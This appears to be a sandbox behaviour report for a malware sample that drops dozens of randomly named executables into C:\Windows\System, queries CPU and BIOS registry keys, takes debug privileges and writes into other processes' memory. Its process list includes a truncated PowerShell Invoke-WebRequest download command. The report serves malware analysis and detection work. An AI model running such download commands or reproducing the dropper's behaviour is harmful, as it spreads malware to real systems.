File created C:\Windows\System\fvuVukb.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\UyVHQos.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CCgluTE.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\xYeGHYY.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\URfXLKu.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GIsEIpH.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tcsNLeY.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LiVgiDR.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VIiuTQe.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\JNwEHgn.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\LWSZikN.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\olGwKaL.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\YPATatU.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tweRinh.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\BvXujDW.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\kFELYKx.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\oLUjTcM.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VvPaXDD.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CMpgkGZ.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZZUTnVy.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\XchTulP.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
File created C:\Windows\System\whTYoyy.exe C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFaultSecure.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFaultSecure.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 208 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ifQndzY.exe
PID 208 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ifQndzY.exe
PID 208 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ipWXVFr.exe
PID 208 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ipWXVFr.exe
PID 208 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jaAuCtC.exe
PID 208 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jaAuCtC.exe
PID 208 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\LgfzDBn.exe
PID 208 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\LgfzDBn.exe
PID 208 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\okmMnPl.exe
PID 208 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\okmMnPl.exe
PID 208 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\MhLqYRz.exe
PID 208 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\MhLqYRz.exe
PID 208 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\HKqdahk.exe
PID 208 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\HKqdahk.exe
PID 208 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\GNUWyHB.exe
PID 208 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\GNUWyHB.exe
PID 208 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\xkjhmwC.exe
PID 208 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\xkjhmwC.exe
PID 208 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\AmxBrUH.exe
PID 208 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\AmxBrUH.exe
PID 208 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\oDWnPfE.exe
PID 208 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\oDWnPfE.exe
PID 208 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uOgSixk.exe
PID 208 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uOgSixk.exe
PID 208 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\rJydOJW.exe
PID 208 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\rJydOJW.exe
PID 208 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\FAROysU.exe
PID 208 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\FAROysU.exe
PID 208 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\PNpnkwR.exe
PID 208 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\PNpnkwR.exe
PID 208 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\wOIpRBT.exe
PID 208 wrote to memory of 3692 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\wOIpRBT.exe
PID 208 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\TZCAEHl.exe
PID 208 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\TZCAEHl.exe
PID 208 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\YAnlios.exe
PID 208 wrote to memory of 792 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\YAnlios.exe
PID 208 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\mTuDxUL.exe
PID 208 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\mTuDxUL.exe
PID 208 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zSPoBFR.exe
PID 208 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zSPoBFR.exe
PID 208 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\CmdKrOa.exe
PID 208 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\CmdKrOa.exe
PID 208 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ivvBPaY.exe
PID 208 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\ivvBPaY.exe
PID 208 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zMedrBD.exe
PID 208 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\zMedrBD.exe
PID 208 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\vIAhSLq.exe
PID 208 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\vIAhSLq.exe
PID 208 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jUMVpNd.exe
PID 208 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jUMVpNd.exe
PID 208 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uFEkMbr.exe
PID 208 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\uFEkMbr.exe
PID 208 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\RTqRbLm.exe
PID 208 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\RTqRbLm.exe
PID 208 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\UnNFDEl.exe
PID 208 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\UnNFDEl.exe
PID 208 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\VbSEeme.exe
PID 208 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\VbSEeme.exe
PID 208 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jJIBQXE.exe
PID 208 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\jJIBQXE.exe
PID 208 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\EymKlZn.exe
PID 208 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe C:\Windows\System\EymKlZn.exe

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\35960d9c8978b20e715367987017fa80_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\ifQndzY.exe

C:\Windows\System\ifQndzY.exe

C:\Windows\System\ipWXVFr.exe

C:\Windows\System\ipWXVFr.exe

C:\Windows\System\jaAuCtC.exe

C:\Windows\System\jaAuCtC.exe

C:\Windows\System\LgfzDBn.exe

C:\Windows\System\LgfzDBn.exe

C:\Windows\System\okmMnPl.exe

C:\Windows\System\okmMnPl.exe

C:\Windows\System\MhLqYRz.exe

C:\Windows\System\MhLqYRz.exe

C:\Windows\System\HKqdahk.exe

C:\Windows\System\HKqdahk.exe

C:\Windows\System\GNUWyHB.exe

C:\Windows\System\GNUWyHB.exe

C:\Windows\System\xkjhmwC.exe

C:\Windows\System\xkjhmwC.exe

C:\Windows\System\AmxBrUH.exe

C:\Windows\System\AmxBrUH.exe

C:\Windows\System\oDWnPfE.exe

C:\Windows\System\oDWnPfE.exe

C:\Windows\System\uOgSixk.exe

C:\Windows\System\uOgSixk.exe

C:\Windows\System\rJydOJW.exe

C:\Windows\System\rJydOJW.exe

C:\Windows\System\FAROysU.exe

C:\Windows\System\FAROysU.exe

C:\Windows\System\PNpnkwR.exe

C:\Windows\System\PNpnkwR.exe

C:\Windows\System\wOIpRBT.exe

C:\Windows\System\wOIpRBT.exe

C:\Windows\System\TZCAEHl.exe

C:\Windows\System\TZCAEHl.exe

C:\Windows\System\YAnlios.exe

C:\Windows\System\YAnlios.exe

C:\Windows\System\mTuDxUL.exe

C:\Windows\System\mTuDxUL.exe

C:\Windows\System\zSPoBFR.exe

C:\Windows\System\zSPoBFR.exe

C:\Windows\System\CmdKrOa.exe

C:\Windows\System\CmdKrOa.exe

C:\Windows\System\ivvBPaY.exe

C:\Windows\System\ivvBPaY.exe

C:\Windows\System\zMedrBD.exe

C:\Windows\System\zMedrBD.exe

C:\Windows\System\vIAhSLq.exe

C:\Windows\System\vIAhSLq.exe

C:\Windows\System\jUMVpNd.exe

C:\Windows\System\jUMVpNd.exe

C:\Windows\System\uFEkMbr.exe

C:\Windows\System\uFEkMbr.exe

C:\Windows\System\RTqRbLm.exe

C:\Windows\System\RTqRbLm.exe

C:\Windows\System\UnNFDEl.exe

C:\Windows\System\UnNFDEl.exe

C:\Windows\System\VbSEeme.exe

C:\Windows\System\VbSEeme.exe

C:\Windows\System\jJIBQXE.exe

C:\Windows\System\jJIBQXE.exe

C:\Windows\System\EymKlZn.exe

C:\Windows\System\EymKlZn.exe

C:\Windows\System\kNCxyGB.exe

C:\Windows\System\kNCxyGB.exe

C:\Windows\System\eqroqCr.exe

C:\Windows\System\eqroqCr.exe

C:\Windows\System\uuGccWN.exe

C:\Windows\System\uuGccWN.exe

C:\Windows\System\vdjwwvj.exe

C:\Windows\System\vdjwwvj.exe

C:\Windows\System\erSJxWX.exe

C:\Windows\System\erSJxWX.exe

C:\Windows\System\mbTooqp.exe

C:\Windows\System\mbTooqp.exe

C:\Windows\System\nqiYQch.exe

C:\Windows\System\nqiYQch.exe

C:\Windows\System\JRbqhLS.exe

C:\Windows\System\JRbqhLS.exe

C:\Windows\System\WYQyfou.exe

C:\Windows\System\WYQyfou.exe

C:\Windows\System\fKqXrXf.exe

C:\Windows\System\fKqXrXf.exe

C:\Windows\System\orndOFF.exe

C:\Windows\System\orndOFF.exe

C:\Windows\System\nTmThpr.exe

C:\Windows\System\nTmThpr.exe

C:\Windows\System\WwxVUgV.exe

C:\Windows\System\WwxVUgV.exe

C:\Windows\System\EQrCocv.exe

C:\Windows\System\EQrCocv.exe

C:\Windows\System\nvCJULy.exe

C:\Windows\System\nvCJULy.exe

C:\Windows\System\itIQtXw.exe

C:\Windows\System\itIQtXw.exe

C:\Windows\System\NcxJKEj.exe

C:\Windows\System\NcxJKEj.exe

C:\Windows\System\QafOrHJ.exe

C:\Windows\System\QafOrHJ.exe

C:\Windows\System\dGQMWel.exe

C:\Windows\System\dGQMWel.exe

C:\Windows\System\Hsvotfc.exe

C:\Windows\System\Hsvotfc.exe

C:\Windows\System\AoGdRUL.exe

C:\Windows\System\AoGdRUL.exe

C:\Windows\System\KucEzuS.exe

C:\Windows\System\KucEzuS.exe

C:\Windows\System\OeVsRaD.exe

C:\Windows\System\OeVsRaD.exe

C:\Windows\System\xFEUpAY.exe

C:\Windows\System\xFEUpAY.exe

C:\Windows\System\ghrYUAq.exe

C:\Windows\System\ghrYUAq.exe

C:\Windows\System\SWZPwLk.exe

C:\Windows\System\SWZPwLk.exe

C:\Windows\System\kXwdUHk.exe

C:\Windows\System\kXwdUHk.exe

C:\Windows\System\izrqqEY.exe

C:\Windows\System\izrqqEY.exe

C:\Windows\System\uqBEqbW.exe

C:\Windows\System\uqBEqbW.exe

C:\Windows\System\kHIgBmL.exe

C:\Windows\System\kHIgBmL.exe

C:\Windows\System\ciyQNTx.exe

C:\Windows\System\ciyQNTx.exe

C:\Windows\System\HEXUmhe.exe

C:\Windows\System\HEXUmhe.exe

C:\Windows\System\bHlPGAF.exe

C:\Windows\System\bHlPGAF.exe

C:\Windows\System\ZxMpngt.exe

C:\Windows\System\ZxMpngt.exe

C:\Windows\System\ZqvyWeq.exe

C:\Windows\System\ZqvyWeq.exe

C:\Windows\System\pbxfNej.exe

C:\Windows\System\pbxfNej.exe

C:\Windows\System\TqwPOvy.exe

C:\Windows\System\TqwPOvy.exe

C:\Windows\System\qNtAQfy.exe

C:\Windows\System\qNtAQfy.exe

C:\Windows\System\ckccYqy.exe

C:\Windows\System\ckccYqy.exe

C:\Windows\System\VTwmyed.exe

C:\Windows\System\VTwmyed.exe

C:\Windows\System\vFjuNdx.exe

C:\Windows\System\vFjuNdx.exe

C:\Windows\System\phXuFCc.exe

C:\Windows\System\phXuFCc.exe

C:\Windows\System\sNhtppn.exe

C:\Windows\System\sNhtppn.exe

C:\Windows\System\kaXcJkT.exe

C:\Windows\System\kaXcJkT.exe

C:\Windows\System\QniOnhb.exe

C:\Windows\System\QniOnhb.exe

C:\Windows\System\NLbdhVo.exe

C:\Windows\System\NLbdhVo.exe

C:\Windows\System\VwNrTiM.exe

C:\Windows\System\VwNrTiM.exe

C:\Windows\System\snymHoi.exe

C:\Windows\System\snymHoi.exe

C:\Windows\System\CVlARpz.exe

C:\Windows\System\CVlARpz.exe

C:\Windows\System\tNclyUp.exe

C:\Windows\System\tNclyUp.exe

C:\Windows\System\IisDznT.exe

C:\Windows\System\IisDznT.exe

C:\Windows\System\SHEJyuW.exe

C:\Windows\System\SHEJyuW.exe

C:\Windows\System\RVdXKxJ.exe

C:\Windows\System\RVdXKxJ.exe

C:\Windows\System\qCGsMYi.exe

C:\Windows\System\qCGsMYi.exe

C:\Windows\System\GIiHAzi.exe

C:\Windows\System\GIiHAzi.exe

C:\Windows\System\ugobPLs.exe

C:\Windows\System\ugobPLs.exe

C:\Windows\System\IYNkhQF.exe

C:\Windows\System\IYNkhQF.exe

C:\Windows\System\bcbLBkM.exe

C:\Windows\System\bcbLBkM.exe

C:\Windows\System\LyojzET.exe

C:\Windows\System\LyojzET.exe

C:\Windows\System\bzzeGga.exe

C:\Windows\System\bzzeGga.exe

C:\Windows\System\DiriFpX.exe

C:\Windows\System\DiriFpX.exe

C:\Windows\System\IZyfVlI.exe

C:\Windows\System\IZyfVlI.exe

C:\Windows\System\fEcSVSA.exe

C:\Windows\System\fEcSVSA.exe

C:\Windows\System\gGNgHFv.exe

C:\Windows\System\gGNgHFv.exe

C:\Windows\System\UAEqxIj.exe

C:\Windows\System\UAEqxIj.exe

C:\Windows\System\TCSAjhk.exe

C:\Windows\System\TCSAjhk.exe

C:\Windows\System\raLSQzu.exe

C:\Windows\System\raLSQzu.exe

C:\Windows\System\jpRouTe.exe

C:\Windows\System\jpRouTe.exe

C:\Windows\System\LHzAWrK.exe

C:\Windows\System\LHzAWrK.exe

C:\Windows\System\HpEtvcy.exe

C:\Windows\System\HpEtvcy.exe

C:\Windows\System\MzanzYg.exe

C:\Windows\System\MzanzYg.exe

C:\Windows\System\ThqvlcO.exe

C:\Windows\System\ThqvlcO.exe

C:\Windows\System\RKyWZCs.exe

C:\Windows\System\RKyWZCs.exe

C:\Windows\System\yGHIqSQ.exe

C:\Windows\System\yGHIqSQ.exe

C:\Windows\System\cfFmhRY.exe

C:\Windows\System\cfFmhRY.exe

C:\Windows\System\XvZWDLC.exe

C:\Windows\System\XvZWDLC.exe

C:\Windows\System\TFNVZoG.exe

C:\Windows\System\TFNVZoG.exe

C:\Windows\System\wctBukv.exe

C:\Windows\System\wctBukv.exe

C:\Windows\System\SbPlFdM.exe

C:\Windows\System\SbPlFdM.exe

C:\Windows\System\TEspKSh.exe

C:\Windows\System\TEspKSh.exe

C:\Windows\System\yrLKDeW.exe

C:\Windows\System\yrLKDeW.exe

C:\Windows\System\PzNVPzR.exe

C:\Windows\System\PzNVPzR.exe

C:\Windows\System\DPlBqlV.exe

C:\Windows\System\DPlBqlV.exe

C:\Windows\System\NfBxFgM.exe

C:\Windows\System\NfBxFgM.exe

C:\Windows\System\mEDOvgH.exe

C:\Windows\System\mEDOvgH.exe

C:\Windows\System\WHjPNCi.exe

C:\Windows\System\WHjPNCi.exe

C:\Windows\System\yoIDbiR.exe

C:\Windows\System\yoIDbiR.exe

C:\Windows\System\fZbeWSP.exe

C:\Windows\System\fZbeWSP.exe

C:\Windows\System\PzteiBv.exe

C:\Windows\System\PzteiBv.exe

C:\Windows\System\hhOJkEJ.exe

C:\Windows\System\hhOJkEJ.exe

C:\Windows\System\kEGuhiQ.exe

C:\Windows\System\kEGuhiQ.exe

C:\Windows\System\DUTQCGI.exe

C:\Windows\System\DUTQCGI.exe

C:\Windows\System\rNEBscX.exe

C:\Windows\System\rNEBscX.exe

C:\Windows\System\wAtBrES.exe

C:\Windows\System\wAtBrES.exe

C:\Windows\System\HliWnnD.exe

C:\Windows\System\HliWnnD.exe

C:\Windows\System\cFZUjIv.exe

C:\Windows\System\cFZUjIv.exe

C:\Windows\System\nONJmMr.exe

C:\Windows\System\nONJmMr.exe

C:\Windows\System\CjCChOZ.exe

C:\Windows\System\CjCChOZ.exe

C:\Windows\System\gtafduI.exe

C:\Windows\System\gtafduI.exe

C:\Windows\System\zejeNhD.exe

C:\Windows\System\zejeNhD.exe

C:\Windows\System\BMfYoHR.exe

C:\Windows\System\BMfYoHR.exe

C:\Windows\System\CDkTvam.exe

C:\Windows\System\CDkTvam.exe

C:\Windows\System\OWbeJtF.exe

C:\Windows\System\OWbeJtF.exe

C:\Windows\System\pAtzmED.exe

C:\Windows\System\pAtzmED.exe

C:\Windows\System\wRmRyaH.exe

C:\Windows\System\wRmRyaH.exe

C:\Windows\System\KJePwyj.exe

C:\Windows\System\KJePwyj.exe

C:\Windows\System\chtDluZ.exe

C:\Windows\System\chtDluZ.exe

C:\Windows\System\MyZEzYO.exe

C:\Windows\System\MyZEzYO.exe

C:\Windows\System\UTMqYmC.exe

C:\Windows\System\UTMqYmC.exe

C:\Windows\System\jdRbaBx.exe

C:\Windows\System\jdRbaBx.exe

C:\Windows\System\qYTHHpw.exe

C:\Windows\System\qYTHHpw.exe

C:\Windows\System\TwZxyiw.exe

C:\Windows\System\TwZxyiw.exe

C:\Windows\System\HSFOGFF.exe

C:\Windows\System\HSFOGFF.exe

C:\Windows\System\ukZeQmx.exe

C:\Windows\System\ukZeQmx.exe

C:\Windows\System\ehRyWyY.exe

C:\Windows\System\ehRyWyY.exe

C:\Windows\System\ZcrQFWc.exe

C:\Windows\System\ZcrQFWc.exe

C:\Windows\System\ATtCuDJ.exe

C:\Windows\System\ATtCuDJ.exe

C:\Windows\System\NQzAWut.exe

C:\Windows\System\NQzAWut.exe

C:\Windows\System\LwMpcGk.exe

C:\Windows\System\LwMpcGk.exe

C:\Windows\System\XXdlUqR.exe

C:\Windows\System\XXdlUqR.exe

C:\Windows\System\taLBXbA.exe

C:\Windows\System\taLBXbA.exe

C:\Windows\System\RbdNJaz.exe

C:\Windows\System\RbdNJaz.exe

C:\Windows\System\EAhloZq.exe

C:\Windows\System\EAhloZq.exe

C:\Windows\System\wJtFWsV.exe

C:\Windows\System\wJtFWsV.exe

C:\Windows\System\DFMwjUK.exe

C:\Windows\System\DFMwjUK.exe

C:\Windows\System\BkgfajV.exe

C:\Windows\System\BkgfajV.exe

C:\Windows\System\keSICSc.exe

C:\Windows\System\keSICSc.exe

C:\Windows\System\GFvfJro.exe

C:\Windows\System\GFvfJro.exe

C:\Windows\System\UjXNChl.exe

C:\Windows\System\UjXNChl.exe

C:\Windows\System\odMzTtB.exe

C:\Windows\System\odMzTtB.exe

C:\Windows\System\AzqCxWZ.exe

C:\Windows\System\AzqCxWZ.exe

C:\Windows\System\eLPadqD.exe

